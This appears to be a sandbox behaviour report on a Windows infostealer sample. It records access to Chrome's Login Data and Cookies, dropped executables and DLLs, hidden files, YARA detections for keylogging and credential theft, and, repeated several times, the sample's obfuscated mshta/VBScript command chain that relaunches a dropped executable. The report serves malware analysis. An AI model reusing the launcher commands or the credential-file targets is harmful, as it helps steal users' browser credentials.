file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\
file	C:\Users\test22\AppData\Local\Google\Chrome\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\
file	C:\Users\test22\AppData\Local\Chromium\User Data
file	C:\Users\test22\AppData\Local\MapleStudio\ChromePlus\User Data
file	C:\Users\test22\AppData\Local\Nichrome\User Data
file	C:\Users\test22\AppData\Local\Yandex\YandexBrowser\User Data

Creates executable files on the filesystem (11 events)

file	C:\ProgramData\60\msvcp140.dll
file	C:\ProgramData\60\softokn3.dll
file	C:\ProgramData\60\freebl3.dll
file	C:\ProgramData\60\vcruntime140.dll
file	C:\ProgramData\4446173.exe
file	C:\ProgramData\2185135.exe
file	C:\ProgramData\60\mozglue.dll
file	C:\ProgramData\853147.exe
file	C:\ProgramData\60\nss3.dll
file	C:\ProgramData\60\sqlite3.dll
file	C:\ProgramData\1174114.exe

Creates hidden or system file (2 events)

Time & API	Arguments	Status	Return	Repeated
SetFileAttributesW Sept. 12, 2021, 3:10 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Users\test22\AppData\Roaming\WinHost filepath: C:\Users\test22\AppData\Roaming\WinHost	1	1	0
SetFileAttributesW Sept. 12, 2021, 3:10 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Users\test22\AppData\Roaming\WinHost\WinHoster.exe filepath: C:\Users\test22\AppData\Roaming\WinHost\WinHoster.exe	1	1	0

Creates a suspicious process (8 events)

cmdline	"C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\4446173.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If """"== """" for %l In ( ""C:\ProgramData\4446173.exe"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))
cmdline	C:\Windows\System32\cmd.exe /q /C cOPy /Y "C:\ProgramData\4446173.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""=="" for %l In ( "C:\ProgramData\4446173.exe") do taskkill -Im "%~nxl" /F
cmdline	"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\4446173.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""=="" for %l In ( "C:\ProgramData\4446173.exe") do taskkill -Im "%~nxl" /F
cmdline	MSHtA.exE vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))
cmdline	"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "=="" for %l In ( "C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F
cmdline	C:\Windows\System32\cmd.exe /q /C cOPy /Y "C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "=="" for %l In ( "C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F
cmdline	"C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))
cmdline	MSHtA.exE vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\4446173.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If """"== """" for %l In ( ""C:\ProgramData\4446173.exe"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))

Drops a binary and executes it (4 events)

file	C:\ProgramData\853147.exe
file	C:\ProgramData\1174114.exe
file	C:\ProgramData\4446173.exe
file	C:\ProgramData\2185135.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\zyYHq.U

Executes one or more WMI queries (1 event)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "4446173.exe")

A process created a hidden window (6 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Sept. 12, 2021, 2:45 p.m.	show_type: 0 filepath_r: C:\ProgramData\853147.exe parameters: filepath: C:\ProgramData\853147.exe	1	1
ShellExecuteExW Sept. 12, 2021, 2:45 p.m.	show_type: 0 filepath_r: C:\ProgramData\1174114.exe parameters: filepath: C:\ProgramData\1174114.exe	1	1
ShellExecuteExW Sept. 12, 2021, 2:45 p.m.	show_type: 0 filepath_r: C:\ProgramData\4446173.exe parameters: filepath: C:\ProgramData\4446173.exe	1	1
ShellExecuteExW Sept. 12, 2021, 2:45 p.m.	show_type: 0 filepath_r: C:\ProgramData\2185135.exe parameters: filepath: C:\ProgramData\2185135.exe	1	1
ShellExecuteExW Sept. 12, 2021, 3:11 p.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /q /C cOPy /Y "C:\ProgramData\4446173.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""=="" for %l In ( "C:\ProgramData\4446173.exe") do taskkill -Im "%~nxl" /F filepath: C:\Windows\System32\cmd.exe	1	1
ShellExecuteExW Sept. 12, 2021, 3:11 p.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /q /C cOPy /Y "C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "=="" for %l In ( "C:\Users\test22\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F filepath: C:\Windows\System32\cmd.exe	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 12, 2021, 2:45 p.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0000f000', u'virtual_address': u'0x00002000', u'entropy': 7.335663636528003, u'name': u'.text', u'virtual_size': u'0x0000eee4'}

entropy

7.33566363653

description

A section with a high entropy has been found

entropy

0.466926070039

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 12, 2021, 3:11 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Sept. 12, 2021, 3:11 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Potentially malicious URLs were found in the process memory dump (50 out of 121 events)

url	http://crl.comodo.net/TrustedCertificateServices.crl0
url	http://users.ocsp.d-trust.net03
url	http://crl.ssc.lt/root-b/cacrl.crl0
url	http://crl.securetrust.com/STCA.crl0
url	http://crl.securetrust.com/SGCA.crl0
url	http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
url	http://www.ssc.lt/cps03
url	http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
url	http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
url	http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
url	http://www.microsoft.com/pki/certs/TrustListPCA.crt0
url	https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
url	http://www.pkioverheid.nl/policies/root-policy0
url	http://cps.chambersign.org/cps/chambersroot.html0
url	http://www.e-szigno.hu/SZSZ/0
url	http://www.entrust.net/CRL/Client1.crl0
url	http://crl.chambersign.org/publicnotaryroot.crl0
url	http://crl.comodo.net/AAACertificateServices.crl0
url	http://www.certplus.com/CRL/class3.crl0
url	http://logo.verisign.com/vslogo.gif0
url	http://www.acabogacia.org/doc0
url	http://www.disig.sk/ca/crl/ca_disig.crl0
url	https://www.catcert.net/verarrel
url	http://www.sk.ee/cps/0
url	http://www.quovadis.bm0
url	https://www.catcert.net/verarrel05
url	http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
url	http://crl.chambersign.org/chambersroot.crl0
url	http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
url	http://crl.globalsign.net/root-r2.crl0
url	http://certificates.starfieldtech.com/repository/1604
url	http://www.d-trust.net0
url	http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
url	http://crl.ssc.lt/root-a/cacrl.crl0
url	http://crl.usertrust.com/UTN-DATACorpSGC.crl0
url	http://www.certicamara.com/certicamaraca.crl0
url	http://www.d-trust.net/crl/d-trust_root_class_2_ca_2007.crl0
url	http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
url	http://www.post.trust.ie/reposit/cps.html0
url	http://qual.ocsp.d-trust.net0
url	http://www2.public-trust.com/crl/ct/ctroot.crl0
url	http://www.certicamara.com0
url	http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
url	http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
url	http://www.comsign.co.il/cps0
url	http://crl.usertrust.com/UTN-USERFirst-NetworkApplications.crl0
url	http://www.microsoft.com/pki/crl/products/TrustListPCA.crl
url	http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
url	http://www.signatur.rtr.at/de/directory/cps.html0
url	http://www.globaltrust.info0

Yara rule detected in process memory (39 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Install itself for autorun at Windows startup	rule	Persistence
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (39 events)

Time & API	Arguments	Status
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000006c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: AddressBook base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: Connection Manager base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: DirectDrawEx base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: EditPlus base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: ENTERPRISE base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: Fontcore base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: Google Chrome base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: IE40 base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: IE4Data base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: IE5BAKEX base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: IEData base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: MobileOptionPack base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: SchedulingAgent base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: WIC base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW Sept. 12, 2021, 3:11 p.m.	regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x000006c4 key_handle: 0x000006c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess Sept. 12, 2021, 3:11 p.m.	status_code: 0x00000001 process_identifier: 1116 process_handle: 0x00000188		0	0
NtTerminateProcess Sept. 12, 2021, 3:11 p.m.	status_code: 0x00000001 process_identifier: 1116 process_handle: 0x00000188	1	0	0

Uses Windows utilities for basic Windows functionality (9 events)

cmdline	"C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\4446173.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If """"== """" for %l In ( ""C:\ProgramData\4446173.exe"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))
cmdline	C:\Windows\System32\cmd.exe /q /C cOPy /Y "C:\ProgramData\4446173.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""=="" for %l In ( "C:\ProgramData\4446173.exe") do taskkill -Im "%~nxl" /F
cmdline	taskkill -Im "4446173.exe" /F
cmdline	"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\4446173.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""=="" for %l In ( "C:\ProgramData\4446173.exe") do taskkill -Im "%~nxl" /F
